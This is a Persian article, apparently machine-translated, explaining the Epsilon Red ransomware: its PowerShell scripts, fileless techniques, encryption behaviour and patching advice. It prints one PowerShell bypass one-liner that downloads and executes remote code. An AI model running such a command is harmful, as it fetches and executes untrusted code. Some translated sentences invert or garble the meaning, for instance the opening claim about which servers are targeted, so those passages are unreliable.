26
ژوئن

Ransomware Epsilon Red چیست و آیا در معرض خطر هستید؟

آیا سرورهای خود را وصله کرده اید؟

تهدید جدیدی برای باج افزارها ، معروف به Epsilon Red ، سرورهای مبتنی بر مایکروسافت در مراکز داده سازمانی را هدف قرار نمی دهد. نام شرور کمیک شناخته شده مارول ، Epsilon Red ، اخیراً توسط یک شرکت امنیت سایبری معروف به Sophos کشف شد. از زمان کشف ، این باج افزار به بسیاری از سازمانهای جهان حمله کرده است.

PowerShell چیست؟

طبق گفته Sophos ، این بدافزار از ترکیب برنامه نویسی Go و اسکریپت های PowerShell برای حمله به اهداف استفاده می کند. ویژگی های اسکریپت PowerShell Epsilon Red به آن امکان می دهد تا سرورهای مستقر در مایکروسافت را به خطر بیندازد. PowerShell مایکروسافت یک خط فرمان و سیستم عامل برنامه نویسی است که بر روی .NET Framework ساخته شده است.

مرتبط: Microsoft PowerShell چیست؟

PowerShell امکاناتی مانند امکان اجرای از راه دور دستورات ، دسترسی به API های اصلی مایکروسافت و موارد دیگر را ارائه می دهد. همه این ویژگی ها PowerShell را برای مدیران سیستم و کاربران برای خودکار کردن کارها و فرایندهای مدیریت سیستم عامل مفید می کند.

با این حال ، PowerShell همچنین می تواند به عنوان ابزاری قدرتمند برای ایجاد بدافزار مورد استفاده قرار گیرد. توانایی دسترسی اسکریپت ها به Microsoft Windows Management Tools (WMI) آن را به گزینه ای جذاب برای مهاجمان تبدیل کرده است. رابط Window Management Tools اجازه می دهد اسکریپت های PowerShell به عنوان اصلی مورد اعتماد یک سیستم مایکروسافت شناخته شوند. این اعتماد ذاتی اجازه می دهد تا اسکریپت های PowerShell به عنوان پوششی موثر برای باج افزارهای بدون پرونده استفاده شوند.

تهیه Ransomware بدون فایل با PowerShell

باج افزار بدون فایل نوعی بدافزار است که با کپی برداری از نرم افزارهای قانونی اجرا می شود. بدافزار بدون پرونده مبتنی بر PowerShell از توانایی PowerShell برای بارگیری مستقیم در حافظه دستگاه استفاده می کند. این ویژگی به شما کمک می کند تا بدافزار در اسکریپت های PowerShell شناسایی نشود.

در یک سناریوی معمول ، وقتی اسکریپت اجرا می شود ، ابتدا باید روی دیسک درایو نوشته شود. این اجازه می دهد تا راه حل های حفاظت از نقطه پایانی برای شناسایی اسکریپت. از آنجا که PowerShell از فرایندهای استاندارد اسکریپت نویسی حذف شده است ، می تواند از حفاظت از نقطه پایانی عبور کند. علاوه بر این ، استفاده از پارامتر بای پس در اسکریپت های PowerShell به مهاجمین اجازه می دهد تا محدودیت های اسکریپت شبکه را کنار بگذارند.

مثالی از پارامتر بای پس PowerShell این است:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

همانطور که مشاهده می کنید ، طراحی پارامترهای بای پس PowerShell نسبتاً آسان است.

در پاسخ ، مایکروسافت اصلاحاتی را برای رفع آسیب پذیری بدافزار از راه دور مربوط به PowerShell منتشر کرد. با این حال ، وصله ها فقط در صورت استفاده موثر هستند. بسیاری از سازمان ها دارای استانداردهای آرام سازگاری هستند که محیط آنها را در معرض دید قرار می دهد. طراحی اپسیلون قرمز استفاده از این نوردهی است.

سودمندی دو طرفه Epsilon Red

از آنجا که Epsilon Red بیشترین تأثیر را در سرورهای معیوب مایکروسافت دارد ، از بدافزار می توان به عنوان یک باج افزار و همچنین یک ابزار شناسایی استفاده کرد. اینکه آیا اپسیلون در محیط موفق شود ، درک عمیق تری از توانایی های امنیتی هدف به مهاجم می دهد.

اگر اپسیلون در دسترسی به Microsoft Exchange Server موفق باشد ، یک سازمان نشان داده است که با بهترین روش ها برای محافظت از وصله مطابقت ندارد. برای مهاجم ، این ممکن است به معنای سهولت نفوذ بقیه قسمت میانی هدف توسط اپسیلون باشد.

اپسیلون قرمز برای پنهان کردن میزان بار خود از تکنیک های تاری استفاده می کند. پنهان سازی کد را غیرقابل خواندن می کند و در بدافزار PowerShell برای جلوگیری از خوانایی زیاد اسکریپت های PowerShell استفاده می شود. Eclipses از نام مستعار دستور PowerShell استفاده می کند تا شناسایی نرم افزارهای مخرب در سیاهههای مربوط به PowerShell را برای نرم افزار آنتی ویروس دشوارتر کند.

تصویر گزینه های cmdlet PowerShell

هنوز هم می توان اسکریپت های پنهان PowerShell را با چشم راست تشخیص داد. علامت رایج حمله قریب الوقوع PowerShell Script ایجاد یک شی WebClient است. مهاجم برای ایجاد ارتباط خارجی با یک URL از راه دور که حاوی کد مخربی است ، یک شی WebClient در کد PowerShell ایجاد می کند.

اگر سازمانی بتواند برای رفع صحیح آن هک شود ، احتمال داشتن محافظت امنیتی کافی که بتواند اسکریپتهای تار PowerShell را تشخیص دهد کاهش می یابد. در مقابل ، اگر Epsilon Red نتواند به یک سرور نفوذ کند ، به مهاجم می گوید که شبکه هدف ممکن است بتواند به سرعت بدافزار PowerShell را اشکال زدایی کند ، و این حمله از ارزش کمتری برخوردار است.

نفوذ شبکه قرمز اپسیلون

عملکرد Epsilon Red واضح است. این نرم افزار از یک سری اسکریپت های Powershell برای نفوذ به سرورها استفاده می کند. این اسکریپت های PowerShell از 1.ps1 تا 12.ps1 شماره گذاری شده اند. طراحی هر اسکریپت PowerShell تهیه سرور هدف برای بار نهایی است.

همه اسکریپتهای PowerShell در Epsilon Red یک هدف خاص دارند. یکی از اسکریپتهای PowerShell در Epsilon Red برای دور زدن قوانین فایروال شبکه هدف طراحی شده است. یکی دیگر از این مجموعه برای حذف نرم افزار آنتی ویروس هدف طراحی شده است.

همانطور که حدس می زنید ، این اسکریپت ها به طور یکپارچه کار می کنند تا اطمینان حاصل کنند که هنگام تحویل محموله ، هدف قادر به جلوگیری از پیشرفت سریع آن نیست.

تأمین بار

هنگامی که اسکریپت های PowerShell Epsilon راه را برای بار نهایی آن هموار می کنند ، به عنوان پسوند Red.exe ارسال می شود. Red.exe پس از نفوذ به یک سرور ، پرونده های موجود در سرور را اسکن کرده و لیستی از مسیرهای فهرست را برای هر فایلی که پیدا می کند ، تهیه می کند. پس از ایجاد لیست ، فرایندهای فرزند هر بار از پرونده مخرب والدین به فهرست موجود در لیست تولید می شوند. سپس ، هر پرونده دختر باج افزار مسیر فهرست را از فایل لیست رمزگذاری می کند.

هنگامی که همه مسیرهای فهرست در لیست Epsilon رمزگذاری شدند ، یک فایل .txt برای اطلاع هدف و بیان نیازهای مهاجم باقی می ماند. علاوه بر این ، همه گره های شبکه موجود متصل به سرور خطرناک نفوذ کرده و دامنه بدافزار در شبکه می تواند پیشرفت کند.

چه کسی پشت سر اپسیلون قرمز است؟

هویت مهاجمان استفاده کننده از Epsilon Red هنوز مشخص نیست. اما برخی از سرنخ ها به منشا مهاجمان اشاره دارد. اولین سرنخ ، نام بدافزار است. اپسیلون رد یک شرور مردان ایکس است و داستانی از اصل روسی دارد.

نکته دوم در یادداشت بازخرید برای فایل .txt باقی مانده توسط کد است. این مانند یادداشتی است که توسط باند باج افزار معروف به REvil به جا مانده است. با این حال ، این شباهت نشان دهنده این نیست که مهاجمان اعضای باند هستند. REvil عملیاتی RaaS (Ransomware as a service) را مدیریت می کند که در آن شرکتهای وابسته برای دسترسی به بدافزارهای خود REVil را پرداخت می کنند.

از خود در برابر قرمز اپسیلون محافظت کنید

تاکنون Epsilon Red با موفقیت به سرورهای بسته بندی نشده نفوذ کرده است. این بدان معناست که یکی از بهترین محافظت ها در برابر Epsilon Red و بدافزارهای باج افزار مشابه ، اطمینان از مدیریت صحیح محیط شما است. علاوه بر این ، داشتن یک راه حل امنیتی که می تواند سریع اسکریپت های PowerShell را اشکال زدایی کند ، یک کمک مفید برای محیط شما خواهد بود.


هشدار بدافزار
آیا بدافزار می تواند برنامه آنتی ویروس شما را فریب دهد و از محافظت از Ransomware عبور کند؟

نرم افزار آنتی ویروس همیشه باج افزار را متوقف نمی کند. در اینجا نحوه برخورد مجرمان اینترنتی با آن و چکارهایی که می توانید در مورد آن انجام دهید وجود دارد.

بعدی را بخوانید


درباره نویسنده

.